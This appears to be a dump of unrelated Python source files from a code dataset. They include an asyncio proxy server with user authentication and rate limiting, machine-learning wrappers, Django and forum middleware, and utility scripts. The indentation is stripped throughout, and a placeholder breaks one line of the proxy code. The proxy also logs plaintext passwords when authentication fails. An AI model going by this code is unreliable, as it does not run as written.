# delete previous file for local Tables (default: "frontendTables.db")
db_filename = os.environ['FRONTEND_DB_FILENAME']
try:
print("Removing old local DB file " + db_filename)
os.remove(db_filename)
except:
print("The file " + db_filename + " did not exist")
pass
# start the sqLite database with the definitions set in the SQL dump file (default: "frontendTables.sql")
#
# Bash equivalent: sqlite3 frontendTables.db < frontendTables.sql
#
db_conn = sqlite3.connect(db_filename)
db_sql_filename = os.environ['FRONTEND_DB_SQL_FILENAME']
try:
print("Trying to read from file " + db_sql_filename)
fd = open(db_sql_filename, 'r')
c = db_conn.cursor()
script = fd.read()
c.executescript(script)
db_conn.close()
fd.close()
except Exception as e:
print("Exception: " + str(e))
print("Could not read file " + db_sql_filename)
print("Please check the value of FRONTEND_DB_SQL_FILENAME in file <env-snappy-fe.src>")
print("")
print("Exiting...")
sys.exit(1)
print("Created new local DB file " + db_filename)
main()
| StarcoderdataPython |
3212932 | <gh_stars>0
'''
Copyright (c)2020, by Qogir, JMJ, MA71
All rights reserved.
File Name: LocalProxy
System Name: SwiftProxy
Date: 2020-12-01
Version: 1.0
Description: 远程代理服务器。该模块主要依赖aiosqlite和asyncio库。
'''
import aiosqlite
import asyncio
import json
import logging
import signal
import argparse
import collections
import traceback
from enum import Enum
ReadMode = Enum('ReadMod', ('EXACT', 'LINE', 'MAX', 'UNTIL')) # 对应四种读模式
class MyError(Exception): # 自定义一个异常类,raise抛出错误实例,便于追踪
pass
async def aioClose(w, *, logHint=None): # 关闭对应服务器,输出log信息
if not w:
await asyncio.sleep(0.001)
return
host, port, *_ = w.get_extra_info('peername')
log.info(f'{logHint} close {host} {port}')
try:
w.close()
await w.wait_closed()
except Exception as exc:
pass
async def aioRead(r, mode, *, logHint=None, exactData=None, exactLen=None, maxLen=-1, untilSep=b'\r\n'): # 读报文,有四种模式
data = None
try:
if ReadMode.EXACT == mode: # 读精确的几字节
exactLen = len(exactData) if exactData else exactLen
data = await r.readexactly(exactLen)
if exactData and data != exactData:
raise MyError(f'recvERR={data} {logHint}')
elif ReadMode.LINE == mode: # 读一行
data = await r.readline()
elif ReadMode.MAX == mode: # 读大量字节,长度为maxLen
data = await r.read(maxLen)
elif ReadMode.UNTIL == mode: # 读到对应分隔符
data = await r.readuntil(untilSep)
else:
log.error(f'INVALID mode={mode}')
exit(1)
except asyncio.IncompleteReadError as exc:
raise MyError(f'recvEXC={exc} {logHint}')
except ConnectionAbortedError as exc:
raise MyError(f'recvEXC={exc} {logHint}')
except ConnectionResetError as exc:
raise MyError(f'recvEXC={exc} {logHint}')
if not data:
raise MyError(f'EOF {logHint}')
return data
async def aioWrite(w, data, *, logHint=''): # 写报文
try:
w.write(data)
await w.drain() # 与write配套,用于立即清空缓冲区
except ConnectionAbortedError as exc:
raise MyError(f'sendEXC={exc} {logHint}')
except ConnectionResetError as exc:
raise MyError(f'recvEXC={exc} {logHint}')
User = collections.namedtuple('User', ['name', 'password', 'dataRate']) # namedtuple可直接用属性名表示item
gUserDict = dict() # 存从数据库中取出的用户信息
gUserDictLock = asyncio.Lock() # 对数据库访问加锁,避免冲突
gLinkCount = 0 # 同时连接remoteproxy的数量
gLeakyBucketDict = dict()
class LeakyBucket: # 令牌桶类,用于流量控制
def __init__(self, tokenLimit): # tokenlimit为用户数据库中的流量限制
self.tokenCount = tokenLimit # 桶中剩余令牌数
self.tokenLimit = tokenLimit
self.tokenSemaphore = asyncio.BoundedSemaphore(1) # 创建信号量确保互斥访问
def __del__(self): # 删除该桶,信号量置空
self.tokenLock = None
self.tokenSemaphore = None
async def acquireToken(self, count): # 获取令牌,数量为count
await self.tokenSemaphore.acquire() # 信号量的P操作
tokenCount = 0 # 此次消耗的令牌数
tokenCount = min(self.tokenCount, count) # 桶中令牌数可能小于所需
self.tokenCount -= tokenCount
if 0 < self.tokenCount: # 若桶中令牌足够
try:
self.tokenSemaphore.release() # 信号量V操作
except ValueError:
pass
return tokenCount
def releaseToken(self, count): # 增加count数量的令牌
self.tokenCount = min(self.tokenCount + count, self.tokenLimit) # 数量不超过limit
try:
self.tokenSemaphore.release()
except ValueError:
pass
async def doLocal(localR, localW): # 处理与localProxy的通信,两个参数分别是stream读写类的实例
global gLinkCount
gLinkCount += 1
serverR, serverW = None, None
try:
localHost, localPort, *_ = localW.get_extra_info('peername')
logHint = f'{localHost} {localPort}'
# 读取local发来的目的地址、用户名密码
firstLine = await aioRead(localR, ReadMode.LINE, logHint=f'1stLine')
firstDict = json.loads(firstLine.strip().decode()) # 转为dict类型
dstHost = firstDict.get('dst')
dstPort = firstDict.get('dport')
username = firstDict.get('user')
password = <PASSWORD>('password')
if not dstHost or not dstPort or not username or not password:
raise MyError(f'ErrorFirst')
user = gUserDict.get(username) # 得到数据库中该user的行
if not user or user.password != password: # 密码不符
raise MyError(f'authFail {username} {password}')
tokenLimit = user.dataRate if user.dataRate else args.tokenLimit # 若用户限制为空,tokenlimit从命令行取得
logHint = f'{logHint} {dstHost} {dstPort}'
log.info(f'{logHint} connStart...')
# 与目标服务器建立TCP连接
serverR, serverW = await asyncio.open_connection(dstHost, dstPort)
bindHost, bindPort, *_ = serverW.get_extra_info('sockname')
log.info(f'{logHint} connSucc bind {bindHost} {bindPort}')
gLinkCount += 1
await aioWrite(localW, f'{bindHost} {bindPort}\r\n'.encode(), logHint='1stLine') # 向local回复bind成功的消息
if username not in gLeakyBucketDict: # 为用户分配其对应的令牌桶
gLeakyBucketDict[username] = LeakyBucket(tokenLimit)
bucket = gLeakyBucketDict.get(username) # 返回当前用户的令牌桶
await asyncio.wait({ # 创建task以并发地传输信息,全双工方式
asyncio.create_task(xferData(bucket, localR, serverW, logHint=f'{logHint} fromLocal', upDirect=True)),
asyncio.create_task(xferData(bucket, serverR, localW, logHint=f'{logHint} fromServer', upDirect=False))
})
except MyError as exc:
log.info(f'{logHint} {exc}')
except json.JSONDecodeError as exc:
log.info(f'{logHint} {exc}')
except OSError:
log.info(f'{logHint} connFail')
except ValueError as exc:
log.info(f'{logHint} {exc}')
except Exception as exc:
log.error(f'{traceback.format_exc()}')
exit(1)
await aioClose(localW, logHint=logHint)
await aioClose(serverW, logHint=logHint)
gLinkCount -= 1
if serverR:
gLinkCount -= 1
async def remoteTask(): # remoteProxy异步任务主函数
asyncio.create_task(dbSyncTask()) # 创建task,异步运行
asyncio.create_task(tokenLeakTask())
srv = await asyncio.start_server(doLocal, host=args.listenHost, port=args.listenPort) # 启动与local的TCP通信服务
addrList = list([s.getsockname() for s in srv.sockets])
log.info(f'LISTEN {addrList}')
async with srv:
await srv.serve_forever() # 持续异步运行
async def dbSyncTask(): # 数据库,同步gUserDict与 gLeakyBucketDict
async with aiosqlite.connect(args.sqliteFile) as db:
while True:
await asyncio.sleep(1) # 每秒1次同步
userDict = dict()
async with db.execute("SELECT name,password,dataRate FROM user;") as cursor: # 执行查询
async for row in cursor:
userDict[row[0]] = User(row[0], row[1], row[2]) # 以username作为key
global gUserDict
global gLeakyBucketDict
gUserDict = userDict
for name, user in gUserDict.items(): # name, user对应key,value
if name in gLeakyBucketDict: # 用户已连接,则返回其对应带宽限制
gLeakyBucketDict[name].tokenLimit = user.dataRate if user.dataRate else args.tokenLimit
async def tokenLeakTask(): # 异步task,生成令牌
while True:
await asyncio.sleep(1)
for username, bucket in gLeakyBucketDict.items():
bucket.releaseToken(bucket.tokenLimit) # 每秒生成limit数量的令牌
async def xferData(bucket, srcR, dstW, *, logHint=None, upDirect): # 单向数据流传输,upDirect判断是否为上行流量
try:
while True:
tokenCount = 65535
if bucket: # remote端有bucket对流量进行限制
tokenCount = await bucket.acquireToken(65535) # 一次读写的maxLen为65535,所以获取该数量令牌
data = await aioRead(srcR, ReadMode.MAX, maxLen=tokenCount, logHint='') # 得到多少令牌,传输多少字节
if bucket:
leftToken = tokenCount - len(data) # 没读到足够数据,因此有剩余令牌
if leftToken:
bucket.releaseToken(leftToken) # 剩余令牌加入令牌桶
await aioWrite(dstW, data, logHint='')
except MyError as exc:
log.info(f'{logHint} {exc}')
await aioClose(dstW, logHint=logHint)
if __name__ == '__main__':
signal.signal(signal.SIGINT, signal.SIG_DFL)
_logFmt = logging.Formatter('%(asctime)s %(levelname).1s %(lineno)-3d %(funcName)-20s %(message)s', datefmt='%H:%M:%S') # 调试信息设置
_consoleHandler = logging.StreamHandler()
_consoleHandler.setLevel(logging.DEBUG)
_consoleHandler.setFormatter(_logFmt)
log = logging.getLogger(__file__)
log.addHandler(_consoleHandler)
log.setLevel(logging.DEBUG)
_parser = argparse.ArgumentParser(description='remote Proxy') # 命令行解析设置
_parser.add_argument('-d', dest='sqliteFile', default='user.db', help='user database sqlite file') # 数据库文件名
_parser.add_argument('-l', dest='listenHost', default='192.168.43.227', help='proxy listen host default listen all interfaces') # 监听的主机地址
_parser.add_argument('-p', dest='listenPort', type=int, default=8889, help='proxy listen port')
_parser.add_argument('-t', dest='tokenLimit', type=int, default=999999, help='bytes/second per user') # 默认的令牌桶流量限制
args = _parser.parse_args()
asyncio.run(remoteTask())
| StarcoderdataPython |
3353056 | from keras.models import Sequential
from keras.layers import Embedding, LSTM, Dense, Activation, LeakyReLU, Dropout, TimeDistributed
from keras.layers import SpatialDropout1D
from config import LSTM_units
from keras.utils.vis_utils import plot_model
def get_model_emotions(vocab_size, sequence_length, embedding_size):
model=Sequential()
model.add(Embedding(vocab_size, embedding_size, input_length=sequence_length))
model.add(SpatialDropout1D(0.15))
model.add(LSTM(LSTM_units, recurrent_dropout=0.2))
model.add(Dropout(0.3))
model.add(Dense(5, activation="softmax"))
model.summary()
plot_model(model, to_file='model_plot.png', show_shapes=True, show_layer_names=True)
return model | StarcoderdataPython |
1614875 | # (C) Datadog, Inc. 2018
# All rights reserved
# Licensed under a 3-clause BSD style license (see LICENSE)
import re
from .utils import get_version_file, load_manifest
from ..utils import read_file, read_file_lines, write_file, write_file_lines
from ..errors import ManifestError
# Maps the Python platform strings to the ones we have in the manifest
PLATFORMS_TO_PY = {
'windows': 'win32',
'mac_os': 'darwin',
'linux': 'linux2',
}
ALL_PLATFORMS = sorted(PLATFORMS_TO_PY)
VERSION = re.compile(r'__version__ *= *(?:[\'"])(.+?)(?:[\'"])')
DATADOG_PACKAGE_PREFIX = 'datadog-'
def get_release_tag_string(check_name, version_string):
"""
Compose a string to use for release tags
"""
return '{}-{}'.format(check_name, version_string)
def update_version_module(check_name, old_ver, new_ver):
"""
Change the Python code in the __about__.py module so that `__version__`
contains the new value.
"""
version_file = get_version_file(check_name)
contents = read_file(version_file)
contents = contents.replace(old_ver, new_ver)
write_file(version_file, contents)
def get_package_name(folder_name):
"""
Given a folder name for a check, return the name of the
corresponding Python package
"""
if folder_name == 'datadog_checks_base':
return 'datadog-checks-base'
return '{}{}'.format(DATADOG_PACKAGE_PREFIX, folder_name.replace('_', '-'))
def get_folder_name(package_name):
"""
Given a Python package name for a check, return the corresponding folder
name in the git repo
"""
if package_name == 'datadog-checks-base':
return 'datadog_checks_base'
return package_name.replace('-', '_')[len(DATADOG_PACKAGE_PREFIX):]
def get_agent_requirement_line(check, version):
"""
Compose a text line to be used in a requirements.txt file to install a check
pinned to a specific version.
"""
package_name = get_package_name(check)
# base check has no manifest
if check == 'datadog_checks_base':
return '{}=={}'.format(package_name, version)
m = load_manifest(check)
platforms = sorted(m.get('supported_os', []))
# all platforms
if platforms == ALL_PLATFORMS:
return '{}=={}'.format(package_name, version)
# one specific platform
elif len(platforms) == 1:
return "{}=={}; sys_platform == '{}'".format(
package_name, version, PLATFORMS_TO_PY.get(platforms[0])
)
elif platforms:
if 'windows' not in platforms:
return "{}=={}; sys_platform != 'win32'".format(package_name, version)
elif 'mac_os' not in platforms:
return "{}=={}; sys_platform != 'darwin'".format(package_name, version)
elif 'linux' not in platforms:
return "{}=={}; sys_platform != 'linux2'".format(package_name, version)
raise ManifestError("Can't parse the `supported_os` list for the check {}: {}".format(check, platforms))
def update_agent_requirements(req_file, check, newline):
"""
Replace the requirements line for the given check
"""
package_name = get_package_name(check)
lines = read_file_lines(req_file)
for i, line in enumerate(lines):
current_package_name = line.split('==')[0]
if current_package_name == package_name:
lines[i] = '{}\n'.format(newline)
break
write_file_lines(req_file, sorted(lines))
| StarcoderdataPython |
111945 | #!/usr/bin/env python
from .model_util import *
from ..exrpc.rpclib import *
from ..exrpc.server import *
from ..matrix.ml_data import FrovedisLabeledPoint
from ..matrix.dtype import TypeUtil
from .metrics import *
import numpy as np
# Decision Tree Regressor Class
class DecisionTreeRegressor:
"A python wrapper of Frovedis Decision Tree Regressor"
"""
parameter : default value
criterion or impurity : 'mse'
plitter : 'best'
in_impurity_decrease : 0.0
in_samples_split : 2
min_samples_leaf : 1
in_weight_fraction_leaf : 0.0
presort : False
verbose : 0
"""
# defaults are as per Frovedis/scikit-learn
# Decision Tree Regressor constructor
def __init__(cls, criterion='mse', splitter='best',
max_depth=None, min_samples_split=2, min_samples_leaf=1,
min_weight_fraction_leaf=0.0, max_features=None, random_state=None,
max_leaf_nodes=1, min_impurity_decrease=0.0, min_impurity_split=None,
class_weight=None, presort=False,
min_info_gain = 0.0, max_bins = 32, verbose = 0):
cls.criterion = criterion.upper()
cls.splitter = splitter
if max_depth is None: cls.max_depth = 5
else: cls.max_depth = max_depth
cls.min_samples_split = min_samples_split
cls.min_samples_leaf = min_samples_leaf
cls.min_weight_fraction_leaf = min_weight_fraction_leaf
cls.max_features = max_features
cls.random_state = random_state
cls.max_leaf_nodes = max_leaf_nodes
cls.min_impurity_decrease = min_impurity_decrease
cls.min_impurity_split = min_impurity_split
cls.class_weight = class_weight
cls.presort = presort
cls.verbose = verbose
# extra
cls.__mid = None
cls.__mdtype = None
cls.__mkind = M_KIND.DTM
# Frovedis side parameters
cls.min_info_gain = min_info_gain
cls.max_bins = max_bins
cls.algo = "Regression"
cls.n_classes_ = 0
#To validate the input parameters
def validate(cls):
if cls.criterion != "MSE":
raise ValueError("Invalid criterion for Decision Tree Regressor!")
elif cls.max_depth < 0:
raise ValueError("max depth can not be negative !")
elif cls.min_info_gain < 0:
raise ValueError("Value of min_info_gain should be greater than 0")
elif cls.max_bins < 0:
raise ValueError("Value of max_bin should be greater than 0")
elif cls.n_classes_ < 0:
raise ValueError("Value of number of classes should be +ve integer or zero!")
elif cls.min_samples_leaf < 0:
raise ValueError("Value of min_samples_leaf should be greater than 0!")
# Fit Decision Tree Regressor according to X (input data), y (Label)
def fit(cls, X, y):
cls.validate()
cls.release()
cls.__mid = ModelID.get()
inp_data = FrovedisLabeledPoint(X,y)
(X, y) = inp_data.get()
dtype = inp_data.get_dtype()
itype = inp_data.get_itype()
dense = inp_data.is_dense()
cls.__mdtype = dtype
(host,port) = FrovedisServer.getServerInstance()
rpclib.dt_train(host,port,X.get(),y.get(),
cls.algo.encode('ascii'), cls.criterion.encode('ascii'),
cls.max_depth, cls.n_classes_, cls.max_bins, cls.min_samples_leaf,
cls.min_info_gain, cls.verbose, cls.__mid,
dtype, itype, dense)
excpt = rpclib.check_server_exception()
if excpt["status"]: raise RuntimeError(excpt["info"])
return cls
# Perform prediction on an array of test vectors X.
def predict(cls,X):
if cls.__mid is not None:
return GLM.predict(X,cls.__mid,cls.__mkind,cls.__mdtype,False)
else:
raise ValueError("predict is called before calling fit, or the model is released.")
# Load the model from a file
def load(cls,fname,dtype=None):
cls.release()
cls.__mid = ModelID.get()
if dtype is None:
if cls.__mdtype is None:
raise TypeError("model type should be specified for loading from file!")
else: cls.__mdtype = TypeUtil.to_id_dtype(dtype)
GLM.load(cls.__mid,cls.__mkind,cls.__mdtype,fname)
return cls
# Save model to a file
def save(cls,fname):
if cls.__mid is not None: GLM.save(cls.__mid,cls.__mkind,cls.__mdtype,fname)
# calculate the root mean square value on the given test data and labels.
def score(cls, X, y):
if cls.__mid is not None:
return r2_score(y, cls.predict(X))
# Show the model
def debug_print(cls):
if cls.__mid is not None: GLM.debug_print(cls.__mid,cls.__mkind,cls.__mdtype)
# Release the model-id to generate new model-id
def release(cls):
if cls.__mid is not None:
GLM.release(cls.__mid,cls.__mkind,cls.__mdtype)
cls.__mid = None
# Check FrovedisServer is up then release
def __del__(cls):
if FrovedisServer.isUP(): cls.release()
# Decision Tree Classifier Class
class DecisionTreeClassifier:
"A python wrapper of Frovedis Decision Tree Classifier"
"""
parameter : default value
criterion or impurity : 'gini'
splitter : 'best'
min_impurity_decrease : 0.0
min_samples_split : 2
min_samples_leaf : 1
min_weight_fraction_leaf : 0.0
presort : False
verbose : 0
"""
# defaults are as per Frovedis/scikit-learn
# Decision Tree Regressor constructor
def __init__(cls, criterion='gini', splitter='best',
max_depth=None, min_samples_split=2, min_samples_leaf=1,
min_weight_fraction_leaf=0.0, max_features=None, random_state=None,
max_leaf_nodes=1, min_impurity_decrease=0.0, min_impurity_split=None,
class_weight=None, presort=False,min_info_gain=0.0,
max_bins=32,verbose=0):
cls.criterion = criterion.upper()
cls.splitter = splitter
if max_depth is None: cls.max_depth = 5
else: cls.max_depth = max_depth
cls.min_samples_split = min_samples_split
cls.min_samples_leaf = min_samples_leaf
cls.min_weight_fraction_leaf = min_weight_fraction_leaf
cls.max_features = max_features
cls.random_state = random_state
cls.min_impurity_decrease = min_impurity_decrease
cls.min_impurity_split = min_impurity_split
cls.class_weight = class_weight
cls.max_leaf_nodes = max_leaf_nodes
cls.presort = presort
cls.verbose = verbose
# extra
cls.__mid = None
cls.__mdtype = None
cls.__mkind = M_KIND.DTM
# Frovedis side parameters
cls.min_info_gain = min_info_gain
cls.max_bins = max_bins
cls.algo = "Classification"
def validate(cls):
if cls.criterion != "GINI" and cls.criterion != "ENTROPY":
raise ValueError("Invalid criterion for Decision Tree Regressor!")
elif cls.max_depth < 0:
raise ValueError("max depth can not be negative !")
elif cls.min_info_gain < 0:
raise ValueError("Value of min_info_gain should be greater than 0")
elif cls.max_bins < 0:
raise ValueError("Value of max_bin should be greater than 0")
elif cls.min_samples_leaf < 0:
raise ValueError("Value of min_samples_leaf should be greater than 0!")
elif cls.n_classes_ < 0:
raise ValueError("Value of number of classes should be +ve integer or zero!")
# Fit Decision Tree classifier according to X (input data), y (Label)
def fit(cls, X, y):
# compute number of classes in given label vector (y)
n_labels = []
for e in y:
if e not in n_labels: n_labels.append(e)
cls.n_classes_ = len(n_labels)
# validate hyper-parameters
cls.validate()
# release old model, if any
cls.release()
# perform the fit
cls.__mid = ModelID.get()
inp_data = FrovedisLabeledPoint(X,y)
(X, y) = inp_data.get()
dtype = inp_data.get_dtype()
itype = inp_data.get_itype()
dense = inp_data.is_dense()
cls.__mdtype = dtype
(host,port) = FrovedisServer.getServerInstance()
rpclib.dt_train(host,port,X.get(),y.get(),
cls.algo.encode('ascii'), cls.criterion.encode('ascii'),
cls.max_depth, cls.n_classes_, cls.max_bins, cls.min_samples_leaf,
cls.min_info_gain, cls.verbose, cls.__mid,
dtype, itype, dense)
excpt = rpclib.check_server_exception()
if excpt["status"]: raise RuntimeError(excpt["info"])
return cls
# Perform classification on an array of test vectors X.
def predict(cls,X):
if cls.__mid is not None:
return GLM.predict(X,cls.__mid,cls.__mkind,cls.__mdtype,False)
else:
raise ValueError("predict is called before calling fit, or the model is released.")
# Perform classification on an array and return probability estimates for the test vector X.
def predict_proba(cls,X):
if cls.__mid is not None:
return GLM.predict(X,cls.__mid,cls.__mkind,cls.__mdtype,True)
else:
raise ValueError("predict is called before calling fit, or the model is released.")
# Load the model from a file
def load(cls,fname,dtype=None):
cls.release()
cls.__mid = ModelID.get()
if dtype is None:
if cls.__mdtype is None:
raise TypeError("model type should be specified for loading from file!")
else: cls.__mdtype = TypeUtil.to_id_dtype(dtype)
GLM.load(cls.__mid,cls.__mkind,cls.__mdtype,fname)
return cls
# calculate the mean accuracy on the given test data and labels.
def score(cls,X,y):
if cls.__mid is not None:
return accuracy_score(y, cls.predict(X))
# Save model to a file
def save(cls,fname):
if cls.__mid is not None: GLM.save(cls.__mid,cls.__mkind,cls.__mdtype,fname)
# Show the model
def debug_print(cls):
if cls.__mid is not None: GLM.debug_print(cls.__mid,cls.__mkind,cls.__mdtype)
# Release the model-id to generate new model-id
def release(cls):
if cls.__mid is not None:
GLM.release(cls.__mid,cls.__mkind,cls.__mdtype)
cls.__mid = None
# Check FrovedisServer is up then release
def __del__(cls):
if FrovedisServer.isUP(): cls.release()
| StarcoderdataPython |
4830474 | <gh_stars>0
"""django_workflow_engine utils."""
import sys
import importlib
from django.conf import settings
from .exceptions import WorkflowImproperlyConfigured
def build_workflow_choices(workflows):
"""Build workflow choices.
Builds a choices list by iterating over the workflows dict
provided.
:param (list) workflows: List of workflows, module path of workflow
including class e.g: ['workflows.onboard_contractor.OnboardContractor, ...]
:returns (list[Tuple]): List of tuples (workflow class name, display name)
"""
choices = []
for display_name, workflow_path in workflows.items():
workflow_class = load_workflow(display_name)
choices.append((workflow_class.name, display_name))
return choices
def lookup_workflow(workflow_name):
"""Look up workflow class.
Given the configured workflows and a workflow name, returns the associated
workflow class.
:param (list) workflows: Configured workflows.
:param (str) name: Workflow name.
:returns (class): The requested workflow class.
:raises (WorkflowImproperlyConfigured): If workflow not found.
"""
for display_name, workflow_path in settings.DJANGO_WORKFLOWS.items():
if display_name == workflow_name:
workflow_class = load_workflow(display_name)
return workflow_class
raise WorkflowImproperlyConfigured(f"Cannot find workflow: {display_name}")
def load_workflow(workflow_key):
"""Load a workflow class.
Given a workflow path, extrapolates the containing package/modules, imports
it and loads specified class.
:param (str) workflow_path: Module path of the work flow including
class e.g: 'workflows.onboard_contractor.OnboardContractor'
:returns (class): The workflow class.
"""
class_or_str = settings.DJANGO_WORKFLOWS[workflow_key]
if type(class_or_str) is not str:
return class_or_str
try:
if "." in class_or_str:
module_path, cls = class_or_str.rsplit(".", 1)
module = importlib.import_module(module_path)
return getattr(module, cls)
else:
return getattr(sys.modules[__name__], class_or_str)
except (ModuleNotFoundError, ImportError, AttributeError) as e:
raise WorkflowImproperlyConfigured(
f"Failed to load workflow from '{class_or_str}': {e}"
)
| StarcoderdataPython |
3284463 | <reponame>pnarvor/nephelae_base<filename>nephelae_scenario/utils.py
# This defines a collection of function to help parsing of yaml configuration
def ensure_dictionary(config):
"""
ensure_dictionary
Ensure that config is a dictionary. If not, it is probably a list of one
element dictionaries (the writer of the configuration file probably put
hyphens '-' in front of his keys). If it is the case, this function will
return a single dictionary built by fusing all the elements of the list.
This function is mostly intended to simplify the parsing functions, as
the output is always a dictionary.
"""
if isinstance(config, dict):
return config
if not isinstance(config, list):
raise TypeError("Unforeseen error in configuration file.\n" +
str(config))
output = {}
for element in config:
if not isinstance(element, dict):
raise ValueError("Parsing error in the configuration file.\n" +
str(element))
if len(element) != 1:
raise ValueError("Parsing error in the configuration file.\n" +
str(element))
# getting one key in the dictionary
key = next(iter(element))
# Checking if key is not already in the output
if key in output.keys():
raise ValueError("Parsing error in the configuration file."+
"Two elements have the same key : " + str(key))
# inserting this element in the output dictionary
output[key] = element[key]
return output
def ensure_list(config):
"""
ensure_list
Ensure that config is a list of one-valued dictionaries. This is called
when the order of elements is important when loading the config file. (The
yaml elements MUST have hyphens '-' in front of them).
Returns config if no exception was raised. This is to keep the same format
as ensure_dictionary, and allowed possible config file repairs in the
future without breaking the API.
"""
if not isinstance(config, list):
raise TypeError("config is not a list. Did you forget some '-' "+
"in your configuration file ?\n" + str(config))
for element in config:
if isinstance(element, str):
continue
if not isinstance(element, dict):
raise ValueError("Parsing error in the configuration file.\n" +
str(element))
if len(element) != 1:
raise ValueError("Parsing error in the configuration file.\n" +
str(element))
return config
def find_aircraft_id(key, config):
"""
find_aircraft_id
The aircraft identifier can be given either as a dictionary key in the yaml
file or under the fields 'identifier' or 'id' in the aircraft configuration
item. This function test in the parsed yaml to find the aircraft id.
"""
if 'identifier' in config.keys():
return str(config['identifier'])
elif 'id' in config.keys():
return str(config['id'])
else:
return str(key)
| StarcoderdataPython |
1659439 | <filename>src/permaviss/gauss_mod_p/__init__.py
""" __init__.py
This module implements the Gaussian elimination of a matrix by column
reductions. Coefficients are assumed to lie on a finite field Z (mod p) Where
p is a prime and Z are the integers. Ideally, this should be implemented in
Cython or similar later on.
"""
| StarcoderdataPython |
3780 | #!/home/a.ghaderi/.conda/envs/envjm/bin/python
# Model 2
import pystan
import pandas as pd
import numpy as np
import sys
sys.path.append('../../')
import utils
parts = 1
data = utils.get_data() #loading dateset
data = data[data['participant']==parts]
mis = np.where((data['n200lat']<.101)|(data['n200lat']>.248))[0] # missing data for n200lat
obs = np.where((data['n200lat']>.101)&(data['n200lat']<.248))[0] # observation and missing data for n200lat
N_mis = mis.shape[0] # number of missing data
N_obs = obs.shape[0] # number of observed data
modelfile = '../../stans/res_nonhier.stan' #reading the model span
f = open(modelfile, 'r')
model_wiener = f.read()
sm = pystan.StanModel(model_code=model_wiener)# Compile the model stan
ncohers = 2 #Number of coherence conditions
nspats = 2 #Number of spatial conditions
nconds = 4 #Number of conditions
y = data['y'].to_numpy()
cond_coher = data['cond_coher'].to_numpy()
cond_spat = data['cond_spat'].to_numpy()
conds = data['conds'].to_numpy()
n200lat = data['n200lat'].to_numpy()
#set inistial data for molde span
data_winner = {'N_obs':N_obs, #Number of trial-level observations
'N_mis':N_mis, #Number of trial-level mising data
'ncohers':ncohers, #Number of coherence conditions
'nspats':nspats, #Number of spatial conditions
'nconds':nconds, #Number of conditions
'y':np.concatenate([y[obs],y[mis]]), #acc*rt in seconds for obervation and missing data
'cond_coher':np.concatenate([cond_coher[obs],cond_coher[mis]]), #Coherence index for each trial
'cond_spat':np.concatenate([cond_spat[obs],cond_spat[mis]]), #sptial index for each trial
'conds':np.concatenate([conds[obs],conds[mis]]), #sptial index for each trial
'n200lat_obs':n200lat[obs]}; #n200 latency for each trial observation
# setting MCMC arguments
niter = 10000
nwarmup = 4000
nchains = 1
thin = 1
initials = [] # initial sampling
for c in range(0, nchains):
chaininit = {
'delta': np.random.uniform(1, 3, size=ncohers),
'alpha': np.random.uniform(.5, 1.),
'eta': np.random.uniform(.01, .2),
'res': np.random.uniform(.01, .02, size=nspats),
'n200sub': np.random.uniform(.11, .2, size=nconds),
'lambda': np.random.uniform(.01, .02),
'n200lat_mis': np.random.uniform(.11, .2, size = N_mis)
}
initials.append(chaininit)
# Train the model and generate samples
fit = sm.sampling(data=data_winner, iter=niter, chains=nchains, warmup=nwarmup, thin=thin, init=initials)
utils.to_pickle(stan_model=sm, stan_fit=fit, save_path='../../save/nonhier/'+str(parts)+'_res_nonhier.pkl')
| StarcoderdataPython |
1752203 | from lithopscloud.modules.gen2.image import ImageConfig
class RayImageConfig(ImageConfig):
def update_config(self, image_id, minimum_provisioned_size):
#minimum_provisioned_size will be used once non default image used
if self.base_config.get('available_node_types'):
for available_node_type in self.base_config['available_node_types']:
self.base_config['available_node_types'][available_node_type]['node_config']['image_id'] = image_id
self.base_config['available_node_types'][available_node_type]['node_config']['boot_volume_capacity'] = minimum_provisioned_size
else:
self.base_config['available_node_types']['ray_head_default']['node_config']['image_id'] = image_id
self.base_config['available_node_types']['ray_head_default']['node_config']['boot_volume_capacity'] = minimum_provisioned_size
| StarcoderdataPython |
5036 | <reponame>grigi/pybbm
# -*- coding: utf-8 -*-
from django.utils import translation
from django.db.models import ObjectDoesNotExist
from pybb import util
from pybb.signals import user_saved
class PybbMiddleware(object):
def process_request(self, request):
if request.user.is_authenticated():
try:
# Here we try to load profile, but can get error
# if user created during syncdb but profile model
# under south control. (Like pybb.Profile).
profile = util.get_pybb_profile(request.user)
except ObjectDoesNotExist:
# Ok, we should create new profile for this user
# and grant permissions for add posts
user_saved(request.user, created=True)
profile = util.get_pybb_profile(request.user)
language = translation.get_language_from_request(request)
if not profile.language:
profile.language = language
profile.save()
if profile.language and profile.language != language:
request.session['django_language'] = profile.language
translation.activate(profile.language)
request.LANGUAGE_CODE = translation.get_language()
| StarcoderdataPython |
117095 | <reponame>dicryptor/MSAS
import numpy as np
import time
import ResponsiveValue
import random
ALPHA = 0.5
deg_sym = u'\u00b0'
def low_pass_test(input_list, output_list=None):
if not output_list: return input_list
for i in range(3):
output[i] = output_list[i] + ALPHA * (input_list[i] - output_list[i])
return output
def low_pass_filter(self, input, output=None):
if not output: return input
output_filtered = output + self.ALPHA * (input - output)
return output_filtered
# smoothVal = None
# // affects the curve of movement amount > snap amount
# // smaller amounts like 0.001 make it ease slower
# // larger amounts like 0.1 make it less smooth
SNAP_MULTIPLIER = 0.007
def dynamicFilter(val, smoothVal=None):
if smoothVal == None: smoothVal = 0
diff = val - smoothVal
snap = snapCurve(diff - SNAP_MULTIPLIER)
smoothVal += (val - smoothVal) * snap
return smoothVal
def snapCurve(x):
y = 1 / (x + 1)
y = (1 - y) * 2
if y > 1:
return 1
else:
return y
# print(sample_input)
output = None
responsiveVal = None
while True:
sample_input = np.random.uniform(low=0.0, high=10.0, size=(3,))
input_list = sample_input.tolist()
sample_val = random.uniform(0.1, 2.5)
responsive_value = ResponsiveValue.ResponsiveValue()
responsive_value.update(sample_val)
print('New Value: {}\t{}\t{}\t{}\t{}\t{}'.format(
sample_val,
responsive_value.has_changed,
responsive_value.raw_value,
responsive_value.responsive_value, # the smoothed out value
responsive_value.sleeping,
responsive_value._error_EMA))
if responsiveVal == None:
responsiveVal = dynamicFilter(sample_val)
else:
responsiveVal = dynamicFilter(sample_val, responsiveVal)
# print("Before filter: {} After filter: {}".format(sample_val, responsiveVal))
if output == None:
output = low_pass_test(input_list)
else:
output = low_pass_test(input_list, output)
# print("Input vals: {:>1.6f} {:>1.6f} {:>1.6f} | Output vals: {:>1.6f} {:>1.6f} {:>1.6f} {}".format(*input_list,
# *output,
# deg_sym))
time.sleep(0.5)
| StarcoderdataPython |
3370947 | <reponame>MaXiaoran/FakeZillow
"""
